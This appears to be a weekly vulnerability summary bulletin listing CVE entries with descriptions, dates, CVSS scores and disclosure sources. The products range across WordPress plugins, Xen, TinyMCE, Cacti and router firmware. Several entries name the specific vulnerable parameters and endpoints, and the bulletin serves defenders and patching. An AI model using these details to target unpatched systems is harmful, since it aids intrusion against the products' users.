newtonsoft.json — newtonsoft.json Newtonsoft.Json before version 13.0.1 is affected by a mishandling of exceptional conditions vulnerability. Crafted data that is passed to the JsonConvert.DeserializeObject method may trigger a StackOverflow exception resulting in denial of service. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial-of-service condition. 2024-01-03 not yet calculated CVE-2024-21907
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
npmjs — npmjs A host header injection vulnerability exists in the NPM package @perfood/couch-auth versions <= 0.20.0. By sending a specially crafted host header in the forgot password request, it is possible to send password reset links to users which, once clicked, lead to an attacker-controlled server and thus leak the password reset token. This may allow an attacker to reset other users’ passwords and take over their accounts. 2024-01-03 not yet calculated CVE-2023-39655
cve@mitre.org
cve@mitre.org
o-ran_software_community — o-ran_software_community An issue was discovered in O-RAN Software Community ric-plt-e2mgr in the G-Release environment, allows remote attackers to cause a denial of service (DoS) via a crafted request to the E2Manager API component. 2024-01-03 not yet calculated CVE-2023-42358
cve@mitre.org
open5gs — open5gs An issue was discovered in open5gs v2.6.6. InitialUEMessage, Registration request sent at a specific time can crash AMF due to incorrect error handling of Nudm_UECM_Registration response. 2024-01-02 not yet calculated CVE-2023-50019
cve@mitre.org
cve@mitre.org
open5gs — open5gs An issue was discovered in open5gs v2.6.6. SIGPIPE can be used to crash AMF. 2024-01-02 not yet calculated CVE-2023-50020
cve@mitre.org
cve@mitre.org
petero.cbor — petero.cbor PeterO.Cbor versions 4.0.0 through 4.5.0 are vulnerable to a denial-of-service vulnerability. An attacker may trigger the denial-of-service condition by providing crafted data to the DecodeFromBytes or other decoding mechanisms in PeterO.Cbor. Depending on the usage of the library, an unauthenticated and remote attacker may be able to cause the denial-of-service condition. 2024-01-03 not yet calculated CVE-2024-21909
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
pico — pico route in main.c in Pico HTTP Server in C through f3b69a6 has a sprintf stack-based buffer overflow via a long URI, leading to remote code execution. 2024-01-05 not yet calculated CVE-2024-22087
cve@mitre.org
plotly — plotly In Plotly plotly.js before 2.25.2, plot API calls have a risk of __proto__ being polluted in expandObjectPaths or nestedProperty. 2024-01-03 not yet calculated CVE-2023-46308
cve@mitre.org
cve@mitre.org
prestashop — prestashop SQL Injection vulnerability in Buy Addons baproductzoommagnifier module for PrestaShop versions 1.0.16 and before, allows remote attackers to escalate privileges and gain sensitive information via BaproductzoommagnifierZoomModuleFrontController::run() method. 2024-01-05 not yet calculated CVE-2023-50027
cve@mitre.org
pycryptodome/pycryptodomex — pycryptodome/pycryptodomex PyCryptodome and pycryptodomex before 3.19.1 allow side-channel leakage for OAEP decryption, exploitable for a Manger attack. 2024-01-05 not yet calculated CVE-2023-52323
cve@mitre.org
cve@mitre.org
rengine — rengine reNgine through 2.0.2 allows OS Command Injection if an adversary has a valid session ID. The attack places shell metacharacters in an api/tools/waf_detector/?url= string. The commands are executed as root via subprocess.check_output. 2024-01-01 not yet calculated CVE-2023-50094
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
royal_tsx — royal_tsx Royal RoyalTSX before 6.0.2.1 allows attackers to cause a denial of service (Heap Memory Corruption and application crash) or possibly have unspecified other impact via a long hostname in an RTSZ file, if the victim clicks on Test Connection. This occurs during SecureGatewayHost object processing in RAPortCheck.createNWConnection. 2023-12-31 not yet calculated CVE-2023-52277
cve@mitre.org
s-cms — s-cms S-CMS v5.0 was discovered to contain an arbitrary file read vulnerability. 2024-01-04 not yet calculated CVE-2023-29962
cve@mitre.org
cve@mitre.org
scone — scone A lack of pointer-validation logic in the __scone_dispatch component of SCONE before v5.8.0 for Intel SGX allows attackers to access sensitive information. 2023-12-30 not yet calculated CVE-2022-46486
cve@mitre.org
cve@mitre.org
cve@mitre.org
scone — scone An issue was discovered in SCONE Confidential Computing Platform before 5.8.0 for Intel SGX. Lack of pointer-alignment logic in __scone_dispatch and other entry functions allows a local attacker to access unauthorized information, aka an “AEPIC Leak.” 2023-12-30 not yet calculated CVE-2023-38023
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
sesami — cash_point_&_transport_optimizer An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to obtain sensitive information and bypass profile restriction via improper access control in the Reader system user’s web browser, allowing the journal to be displayed, despite the option being disabled. 2023-12-29 not yet calculated CVE-2023-31293
cve@mitre.org
sesami — cash_point_&_transport_optimizer CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the Delivery Name field. 2023-12-29 not yet calculated CVE-2023-31294
cve@mitre.org
sesami — cash_point_&_transport_optimizer CSV Injection vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via the User Profile field. 2023-12-29 not yet calculated CVE-2023-31295
cve@mitre.org
sesami — cash_point_&_transport_optimizer Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to execute arbitrary code via the Barcode field of a container. 2023-12-29 not yet calculated CVE-2023-31299
cve@mitre.org
sesami — cash_point_&_transport_optimizer An issue was discovered in Sesami Cash Point & Transport Optimizer (CPTO) version 6.3.8.6 (#718), allows remote attackers to obtain sensitive information via transmission of unencrypted, cleartext credentials during Password Reset feature. 2023-12-29 not yet calculated CVE-2023-31300
cve@mitre.org
sesami — cash_point_&_transport_optimizer Cross Site Scripting (XSS) vulnerability in Sesami Cash Point & Transport Optimizer (CPTO) 6.3.8.6 (#718), allows remote attackers to execute arbitrary code via the Teller field. 2023-12-29 not yet calculated CVE-2023-31302
cve@mitre.org
spip — spip ecrire/public/assembler.php in SPIP before 4.1.3 and 4.2.x before 4.2.7 allows XSS because input from _request() is not restricted to safe characters such as alphanumerics. 2024-01-04 not yet calculated CVE-2023-52322
cve@mitre.org
cve@mitre.org
springblade — springblade An issue in SpringBlade v.3.7.0 and before allows a remote attacker to escalate privileges via the lack of permissions control framework. 2024-01-02 not yet calculated CVE-2023-47458
cve@mitre.org
cve@mitre.org
cve@mitre.org
stmicroelectronics_n.v. — stsafe-a1xx STMicroelectronics STSAFE-A1xx middleware before 3.3.7 allows MCU code execution if an adversary has the ability to read from and write to the I2C bus. This is caused by an StSafeA_ReceiveBytes buffer overflow in the X-CUBE-SAFEA1 Software Package for STSAFE-A sample applications (1.2.0), and thus can affect user-written code that was derived from a published sample application. 2024-01-01 not yet calculated CVE-2023-50096
cve@mitre.org
sympa — sympa Sympa before 6.2.62 relies on a cookie parameter for certain security objectives but does not ensure that this parameter exists and has an unpredictable value. Specifically, the cookie parameter is both a salt for stored passwords and an XSS protection mechanism. 2023-12-31 not yet calculated CVE-2021-46900
cve@mitre.org
cve@mitre.org
cve@mitre.org
tecno_mobile — tecno_camon_x_ca7 Gallery3d on Tecno Camon X CA7 devices allows attackers to view hidden images by navigating to data/com.android.gallery3d/.privatealbum/.encryptfiles and guessing the correct image file extension. 2023-12-31 not yet calculated CVE-2023-52275
cve@mitre.org
cve@mitre.org
tenda — ax3 Tenda AX3 v16.03.12.11 was discovered to contain a remote code execution (RCE) vulnerability via the list parameter at /goform/SetNetControlList. 2024-01-04 not yet calculated CVE-2023-51812
cve@mitre.org
tenda — i29 Buffer Overflow vulnerability in Tenda i29 versions 1.0 V1.0.0.5 and 1.0 V1.0.0.2, allows remote attackers to cause a denial of service (DoS) via the pingIp parameter in the pingSet function. 2024-01-05 not yet calculated CVE-2023-50991
cve@mitre.org
the_genie_company — aladdin_connect Users’ product account authentication data was stored in clear text in The Genie Company Aladdin Connect Mobile Application Version 5.65 Build 2075 (and below) on Android Devices. This allows the attacker, with access to the android device, to potentially retrieve users’ clear text authentication credentials. 2024-01-03 not yet calculated CVE-2023-5879
cve@rapid7.con
the_genie_company — aladdin_connect When the Genie Company Aladdin Connect garage door opener (Retrofit-Kit Model ALDCM) is placed into configuration mode the web servers “Garage Door Control Module Setup” page is vulnerable to XSS via a broadcast SSID name containing malicious code with client side Java Script and/or HTML. This allows the attacker to inject malicious code with client side Java Script and/or HTML into the users’ web browser.  2024-01-03 not yet calculated CVE-2023-5880
cve@rapid7.con
the_genie_company — aladdin_connect Unauthenticated access permitted to web interface page The Genie Company Aladdin Connect (Retrofit-Kit Model ALDCM) “Garage Door Control Module Setup” and modify the Garage door’s SSID settings. 2024-01-03 not yet calculated CVE-2023-5881
cve@rapid7.con
tinymce — tinymce TinyMCE versions before 5.9.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user’s browser. 2024-01-03 not yet calculated CVE-2024-21908
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
tinymce — tinymce TinyMCE versions before 5.10.0 are affected by a cross-site scripting vulnerability. A remote and unauthenticated attacker could introduce crafted image or link URLs that would result in the execution of arbitrary JavaScript in an editing user’s browser. 2024-01-03 not yet calculated CVE-2024-21910
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
tinymce — tinymce TinyMCE versions before 5.6.0 are affected by a stored cross-site scripting vulnerability. An unauthenticated and remote attacker could insert crafted HTML into the editor resulting in arbitrary JavaScript execution in another user’s browser. 2024-01-03 not yet calculated CVE-2024-21911
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
disclosure@vulncheck.com
tms — tms Cross Site Scripting (XSS) vulnerability in xiweicheng TMS v.2.28.0 allows a remote attacker to execute arbitrary code via a crafted script to the click here function. 2024-01-04 not yet calculated CVE-2023-50630
cve@mitre.org
ureport2 — ureport2 Arbitrary File Write vulnerability in the saveReportFile method of ureport2 2.2.9 and before allows attackers to write arbitrary files and run arbitrary commands via crafted POST request. 2024-01-03 not yet calculated CVE-2023-50090
cve@mitre.org
wasm-micro-runtime — wasm-micro-runtime Bytecode Alliance wasm-micro-runtime (aka WebAssembly Micro Runtime or WAMR) before 1.3.0 can have a “double free or corruption” error for a valid WebAssembly module because push_pop_frame_ref_offset is mishandled. 2023-12-31 not yet calculated CVE-2023-52284
cve@mitre.org
cve@mitre.org
cve@mitre.org
wordpress — wordpress The affiliate-toolkit WordPress plugin before 3.4.3 lacks authorization and authentication for requests to its affiliate-toolkit-starter/tools/atkp_imagereceiver.php endpoint, allowing unauthenticated visitors to make requests to arbitrary URL’s, including RFC1918 private addresses, leading to a Server Side Request Forgery (SSRF) issue. 2024-01-01 not yet calculated CVE-2023-5877
contact@wpscan.com
wordpress — wordpress The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks. 2024-01-01 not yet calculated CVE-2023-6000
contact@wpscan.com
contact@wpscan.com
wordpress — wordpress The WP TripAdvisor Review Slider WordPress plugin before 11.9 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) 2024-01-01 not yet calculated CVE-2023-6037
contact@wpscan.com
wordpress — wordpress The PayHere Payment Gateway WordPress plugin before 2.2.12 automatically creates publicly accessible log files containing sensitive information when transactions occur. 2024-01-01 not yet calculated CVE-2023-6064
contact@wpscan.com
wordpress — wordpress The WP STAGING WordPress Backup Plugin before 3.1.3 and WP STAGING Pro WordPress Backup Plugin before 5.1.3 do not prevent visitors from leaking key information about ongoing backups processes, allowing unauthenticated attackers to download said backups later. 2024-01-01 not yet calculated CVE-2023-6113
contact@wpscan.com
contact@wpscan.com
wordpress — wordpress The Backup Migration WordPress plugin before 1.3.6 stores in-progress backups information in easy to find, publicly accessible files, which may allow attackers monitoring those to leak sensitive information from the site’s backups. 2024-01-01 not yet calculated CVE-2023-6271
contact@wpscan.com
contact@wpscan.com
wordpress — wordpress The Download Manager WordPress plugin before 3.2.83 does not protect file download’s passwords, leaking it upon receiving an invalid one. 2024-01-01 not yet calculated CVE-2023-6421
contact@wpscan.com
wordpress — wordpress The Html5 Video Player WordPress plugin before 2.5.19 does not sanitize and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins. 2024-01-01 not yet calculated CVE-2023-6485
contact@wpscan.com
wordpress — wordpress The POST SMTP WordPress plugin before 2.8.7 does not sanitize and escape the msg parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. 2024-01-03 not yet calculated CVE-2023-6621
contact@wpscan.com
xen — xen Arm provides multiple helpers to clean & invalidate the cache for a given region. This is, for instance, used when allocating guest memory to ensure any writes (such as the ones during scrubbing) have reached memory before handing over the page to a guest. Unfortunately, the arithmetic in the helpers can overflow and would then result to skip the cache cleaning/invalidation. Therefore, there is no guarantee when all the writes will reach the memory. 2024-01-05 not yet calculated CVE-2023-34321
security@xen.org
xen — xen For migration as well as to work around kernels unaware of L1TF (see XSA-273), PV guests may be run in shadow paging mode. Since Xen itself needs to be mapped when PV guests run, Xen and shadowed PV guests run directly the respective shadow page tables. For 64-bit PV guests this means running on the shadow of the guest root page table. In the course of dealing with shortage of memory in the shadow pool associated with a domain, shadows of page tables may be torn down. This tearing down may include the shadow root page table that the CPU in question is presently running on. While a precaution exists to supposedly prevent the tearing down of the underlying live page table, the time window covered by that precaution isn’t large enough. 2024-01-05 not yet calculated CVE-2023-34322
security@xen.org
xen — xen When a transaction is committed, C Xenstored will first check the quota is correct before attempting to commit any nodes. It would be possible that accounting is temporarily negative if a node has been removed outside of the transaction. Unfortunately, some versions of C Xenstored are assuming that the quota cannot be negative and are using assert() to confirm it. This will lead to C Xenstored crash when tools are built without -DNDEBUG (this is the default). 2024-01-05 not yet calculated CVE-2023-34323
security@xen.org
xen — xen [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] libfsimage contains parsing code for several filesystems, most of them based on grub-legacy code. libfsimage is used by pygrub to inspect guest disks. Pygrub runs as the same user as the toolstack (root in a priviledged domain). At least one issue has been reported to the Xen Security Team that allows an attacker to trigger a stack buffer overflow in libfsimage. After further analysis the Xen Security Team is no longer confident in the suitability of libfsimage when run against guest controlled input with super user priviledges. In order to not affect current deployments that rely on pygrub patches are provided in the resolution section of the advisory that allow running pygrub in deprivileged mode. CVE-2023-4949 refers to the original issue in the upstream grub project (“An attacker with local access to a system (either through a disk or external drive) can present a modified XFS partition to grub-legacy in such a way to exploit a memory corruption in grub’s XFS file system implementation.”) CVE-2023-34325 refers specifically to the vulnerabilities in Xen’s copy of libfsimage, which is descended from a very old version of grub. 2024-01-05 not yet calculated CVE-2023-34325
security@xen.org
xen — xen The caching invalidation guidelines from the AMD-Vi specification (48882-Rev 3.07-PUB-Oct 2022) is incorrect on some hardware, as devices will malfunction (see stale DMA mappings) if some fields of the DTE are updated but the IOMMU TLB is not flushed. Such stale DMA mappings can point to memory ranges not owned by the guest, thus allowing access to unindented memory regions. 2024-01-05 not yet calculated CVE-2023-34326
security@xen.org
xen — xen [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] AMD CPUs since ~2014 have extensions to normal x86 debugging functionality. Xen supports guests using these extensions. Unfortunately, there are errors in Xen’s handling of the guest state, leading to denials of service. 1) CVE-2023-34327 – An HVM vCPU can end up operating in the context of a previous vCPUs debug mask state. 2) CVE-2023-34328 – A PV vCPU can place a breakpoint over the live GDT. This allows the PV vCPU to exploit XSA-156 / CVE-2015-8104 and lock up the CPU entirely. 2024-01-05 not yet calculated CVE-2023-34327
security@xen.org
xen — xen [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] AMD CPUs since ~2014 have extensions to normal x86 debugging functionality. Xen supports guests using these extensions. Unfortunately, there are errors in Xen’s handling of the guest state, leading to denials of service. 1) CVE-2023-34327 – An HVM vCPU can end up operating in the context of a previous vCPUs debug mask state. 2) CVE-2023-34328 – A PV vCPU can place a breakpoint over the live GDT. This allows the PV vCPU to exploit XSA-156 / CVE-2015-8104 and lock up the CPU entirely. 2024-01-05 not yet calculated CVE-2023-34328
security@xen.org
xen — xen The current setup of the quarantine page tables assumes that the quarantine domain (dom_io) has been initialized with an address width of DEFAULT_DOMAIN_ADDRESS_WIDTH (48) and hence 4-page table levels. However, dom_io being a PV domain gets the AMD-Vi IOMMU page tables levels based on the maximum (hot pluggable) RAM address, and hence on systems with no RAM above the 512GB mark only 3 page-table levels are configured in the IOMMU. On systems without RAM above the 512GB boundary amd_iommu_quarantine_init() will setup page tables for the scratch page with 4 levels, while the IOMMU will be configured to use 3 levels only, resulting in the last page table directory (PDE) effectively becoming a page table entry (PTE), and hence a device in quarantine mode gaining write access to the page destined to be a PDE. Due to this page table level mismatch, the sink page the device gets read/write access to is no longer cleared between device assignment, possibly leading to data leaks. 2024-01-05 not yet calculated CVE-2023-46835
security@xen.org
xen — xen The fixes for XSA-422 (Branch Type Confusion) and XSA-434 (Speculative Return Stack Overflow) are not IRQ-safe. It was believed that the mitigations always operated in contexts with IRQs disabled. However, the original XSA-254 fix for Meltdown (XPTI) deliberately left interrupts enabled on two entry paths; one unconditionally, and one conditionally on whether XPTI was active. As BTC/SRSO and Meltdown affect different CPU vendors, the mitigations are not active together by default. Therefore, there is a race condition whereby a malicious PV guest can bypass BTC/SRSO protections and launch a BTC/SRSO attack against Xen. 2024-01-05 not yet calculated CVE-2023-46836
security@xen.org
xen — xen Arm provides multiple helpers to clean & invalidate the cache for a given region. This is, for instance, used when allocating guest memory to ensure any writes (such as the ones during scrubbing) have reached memory before handing over the page to a guest. Unfortunately, the arithmetic in the helpers can overflow and would then result to skip the cache cleaning/invalidation. Therefore, there is no guarantee when all the writes will reach the memory. This undefined behavior was meant to be addressed by XSA-437, but the approach was not sufficient. 2024-01-05 not yet calculated CVE-2023-46837
security@xen.org
yasm — yasm Use After Free vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the do_directive function in the modules/preprocs/nasm/nasm-pp.c component. 2024-01-03 not yet calculated CVE-2023-49554
cve@mitre.org
yasm — yasm An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_smacro function in the modules/preprocs/nasm/nasm-pp.c component. 2024-01-03 not yet calculated CVE-2023-49555
cve@mitre.org
yasm — yasm Buffer Overflow vulnerability in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expr_delete_term function in the libyasm/expr.c component. 2024-01-03 not yet calculated CVE-2023-49556
cve@mitre.org
yasm — yasm An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the yasm_section_bcs_first function in the libyasm/section.c component. 2024-01-03 not yet calculated CVE-2023-49557
cve@mitre.org
yasm — yasm An issue in YASM 1.3.0.86.g9def allows a remote attacker to cause a denial of service via the expand_mmac_params function in the modules/preprocs/nasm/nasm-pp.c component. 2024-01-03 not yet calculated CVE-2023-49558
cve@mitre.org

Back to top

Categories
alerts

Vulnerability Summary for the Week of December 25, 2023

 High Vulnerabilities

Primary
Vendor — Product		 Description Published CVSS Score Source & Patch Info
awslabs — sandbox-accounts-for-events “Sandbox Accounts for Events” provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially claim and access empty AWS accounts by sending request payloads to the account API containing non-existent event ids and self-defined budget & duration. This issue only affects cleaned AWS accounts, it is not possible to access AWS accounts in use or existing data/infrastructure. This issue has been patched in version 1.1.0. 2023-12-22 7.1 CVE-2023-50928
security-advisories@github.com
security-advisories@github.com
awslabs — sandbox-accounts-for-events Sandbox Accounts for Events provides multiple, temporary AWS accounts to a number of authenticated users simultaneously via a browser-based GUI. Authenticated users could potentially read data from the events table by sending request payloads to the events API, collecting information on planned events, timeframes, budgets and owner email addresses. This data access may allow users to get insights into upcoming events and join events which they have not been invited to. This issue has been patched in version 1.10.0. 2023-12-22 7.8 CVE-2023-51386
security-advisories@github.com
security-advisories@github.com
c-blosc2 — c-blosc2 C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference via the function zfp_prec_decompress at zfp/blosc2-zfp.c. 2023-12-25 7.5 CVE-2023-37185
cve@mitre.org
cve@mitre.org
cve@mitre.org
c-blosc2 — c-blosc2 C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference in ndlz/ndlz8x8.c via a NULL pointer to memset. 2023-12-25 7.5 CVE-2023-37186
cve@mitre.org
cve@mitre.org
cve@mitre.org
c-blosc2 — c-blosc2 C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference via the zfp/blosc2-zfp.c zfp_acc_decompress. function. 2023-12-25 7.5 CVE-2023-37187
cve@mitre.org
cve@mitre.org
cve@mitre.org
c-blosc2 — c-blosc2 C-blosc2 before 2.9.3 was discovered to contain a NULL pointer dereference via the function zfp_rate_decompress at zfp/blosc2-zfp.c. 2023-12-25 7.5 CVE-2023-37188
cve@mitre.org
cve@mitre.org
cve@mitre.org
cacti — cacti Cacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability – arbitrary SQL code execution. As of time of publication, a patch does not appear to exist. 2023-12-22 8.8 CVE-2023-49085
security-advisories@github.com
security-advisories@github.com
cacti — cacti Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `’managers.php’`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `’/cacti/managers.php’` with an SQLi payload in the `’selected_graphs_array’` HTTP GET parameter. As of time of publication, no patched versions exist. 2023-12-22 8.8 CVE-2023-51448
security-advisories@github.com
security-advisories@github.com
campcodes — online_college_library_system A vulnerability has been found in Campcodes Online College Library System 1.0 and classified as critical. This vulnerability affects unknown code of the file index.php of the component Search. The manipulation of the argument category leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249178 is the identifier assigned to this vulnerability. 2023-12-29 7.3 CVE-2023-7156
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
clickhouse — clickhouse ClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20. 2023-12-22 7 CVE-2023-48704
security-advisories@github.com
security-advisories@github.com
cloudflare — miniflare Sending specially crafted HTTP requests to Miniflare’s server could result in arbitrary HTTP and WebSocket requests being sent from the server. If Miniflare was configured to listen on external network interfaces (as was the default in wrangler until 3.19.0), an attacker on the local network could access other local servers. 2023-12-29 7.5 CVE-2023-7078
cna@cloudflare.com
cna@cloudflare.com
cloudflare — wrangler The V8 inspector intentionally allows arbitrary code execution within the Workers sandbox for debugging. wrangler dev would previously start an inspector server listening on all network interfaces. This would allow an attacker on the local network to connect to the inspector and run arbitrary code. Additionally, the inspector server did not validate Origin/Host headers, granting an attacker that can trick any user on the local network into opening a malicious website the ability to run code. If wrangler dev –remote was being used, an attacker could access production resources if they were bound to the worker. This issue was fixed in wrangler@3.19.0 and wrangler@2.20.2. Whilst wrangler dev’s inspector server listens on local interfaces by default as of wrangler@3.16.0, an SSRF vulnerability in miniflare https://github.com/cloudflare/workers-sdk/security/advisories/GHSA-fwvg-2739-22v7  (CVE-2023-7078) allowed access from the local network until wrangler@3.18.0. wrangler@3.19.0 and wrangler@2.20.2 introduced validation for the Origin/Host headers. 2023-12-29 8.5 CVE-2023-7080
cna@cloudflare.com
cna@cloudflare.com
cna@cloudflare.com
cna@cloudflare.com
cna@cloudflare.com
code-projects — faculty_management_system A vulnerability was found in code-projects Faculty Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/php/crud.php. The manipulation of the argument fieldname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248948. 2023-12-25 9.8 CVE-2023-7096
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — library_management_system A vulnerability, which was classified as critical, was found in code-projects Library Management System 2.0. Affected is an unknown function of the file index.php. The manipulation of the argument category leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249006 is the identifier assigned to this vulnerability. 2023-12-26 9.8 CVE-2023-7111
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
code-projects — water_billing_system A vulnerability classified as critical has been found in code-projects Water Billing System 1.0. This affects an unknown part of the file /addbill.php. The manipulation of the argument owners_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248949 was assigned to this vulnerability. 2023-12-25 9.8 CVE-2023-7097
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
coolkit_technology — ewelink_-_smart_home Improper privilege management vulnerability in CoolKit Technology eWeLink on Android and iOS allows application lockscreen bypass. This issue affects eWeLink before 5.2.0. 2023-12-30 7.7 CVE-2023-6998
cvd@cert.pl
cvd@cert.pl
cvd@cert.pl
d-link — d-view_8 A security issue exists in D-Link D-View 8 v2.0.2.89 and prior that could allow an attacker to manipulate the probe inventory of the D-View service. This could result in the disclosure of information from other probes, denial of service conditions due to the probe inventory becoming full, or the execution of tasks on other probes. 2023-12-28 10 CVE-2023-7163
vulnreport@tenable.com
deepin_linux — deepin_linux Deepin Linux’s default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. 2023-12-22 9.3 CVE-2023-50254
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
deepin_linux — deepin_linux Deepin-Compressor is the default archive manager of Deepin Linux OS. Prior to 5.12.21, there’s a path traversal vulnerability in deepin-compressor that can be exploited to achieve Remote Command Execution on the target system upon opening crafted archives. Users are advised to update to version 5.12.21 which addresses the issue. There are no known workarounds for this vulnerability. 2023-12-27 9.3 CVE-2023-50255
security-advisories@github.com
security-advisories@github.com
dell — client_bios Dell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device. 2023-12-22 7.2 CVE-2023-43088
security_alert@emc.com
dell — supportassist_client_consumer Dell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. 2023-12-22 7.3 CVE-2023-48670
security_alert@emc.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue. 2023-12-22 7.5 CVE-2022-39337
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be some simple expressions. However, due to improper sanitization for alert expressions in version prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on hertzbeat server. A malicious user who has access to alert define function can execute any command in hertzbeat instance. This issue is fixed in version 1.4.1. 2023-12-22 7.2 CVE-2023-51387
security-advisories@github.com
security-advisories@github.com
security-advisories@github.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue. 2023-12-22 7.5 CVE-2023-51650
security-advisories@github.com
security-advisories@github.com
engelsystem — engelsystem Englesystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of Javascript code in another user’s context. This vulnerability enables an authenticated user to inject Javascript into other user’s sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1. 2023-12-22 7.3 CVE-2023-50924
security-advisories@github.com
security-advisories@github.com
gm_information_technologies — mdo Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in GM Information Technologies MDO allows SQL Injection. This issue affects MDO: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4675
iletisim@usom.gov.tr
